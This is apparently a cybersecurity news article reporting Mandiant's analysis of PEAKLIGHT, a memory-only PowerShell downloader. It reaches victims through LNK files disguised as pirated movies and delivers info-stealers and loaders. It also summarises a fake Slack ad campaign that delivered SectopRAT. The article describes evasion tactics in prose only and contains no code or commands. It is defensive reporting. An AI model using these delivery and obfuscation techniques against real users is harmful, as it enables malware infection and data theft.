Cybersecurity researchers have discovered a new type of dropper that acts as a conduit for launching next-stage malware, with the primary aim of infecting Windows systems with information stealers and loaders.
"This memory-only dropper decrypts and executes a PowerShell-based downloader," stated researchers from Google-owned Mandiant. "This PowerShell-based downloader is being tracked as PEAKLIGHT."
The malware strains distributed using this method include Lumma Stealer, Hijack Loader (also known as DOILoader, IDAT Loader, or SHADOWLADDER), and CryptBot. All of these strains are advertised under the malware-as-a-service (MaaS) model.
The attack chain begins with a Windows shortcut (LNK) file, which is delivered through drive-by download techniques. For example, this might occur when users search for a movie on search engines. The LNK files are often distributed within ZIP archives disguised as pirated movies to trick users into downloading them.
Upon activation, the LNK file connects to a content delivery network (CDN) hosting an obfuscated memory-only JavaScript dropper. This dropper executes the PEAKLIGHT PowerShell downloader script on the host machine. The downloader then contacts a command-and-control (C2) server to obtain additional malicious payloads.
Mandiant's analysis uncovered multiple variations of these LNK files. Some variations use asterisks (*) as wildcards to execute the legitimate mshta.exe
binary, allowing the dropper to run malicious code retrieved from a remote server discreetly.
Similarly, the droppers have been found to embed both hex-encoded and Base64-encoded PowerShell payloads. These payloads are eventually unpacked to execute PEAKLIGHT, which is engineered to deliver subsequent malware on a compromised system. To further obscure its activities, PEAKLIGHT may also download a legitimate movie trailer, serving as a distraction for the user.
"PEAKLIGHT is an obfuscated PowerShell-based downloader that is part of a multi-stage execution chain," explained Mandiant researchers Aaron Lee and Praveeth D'Souza. "It checks for the presence of ZIP archives in hard-coded file paths. If the archives do not exist, the downloader will connect to a CDN site, download the remotely hosted archive file, and save it to disk."
This revelation comes on the heels of Malwarebytes detailing a separate malvertising campaign. In this campaign, attackers used fraudulent Google Search ads for Slack, the enterprise communications platform, to redirect users to counterfeit websites. These sites hosted malicious installers that ultimately led to the deployment of a remote access trojan named SectopRAT.
These findings highlight the ongoing evolution of malware distribution tactics, with cybercriminals continually devising new methods to exploit users and evade detection. The use of memory-only droppers, combined with the obfuscation of payloads and the exploitation of legitimate-looking downloads, underscores the need for vigilance and advanced cybersecurity measures to detect and thwart these sophisticated attacks.
© 2016 - 2025 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067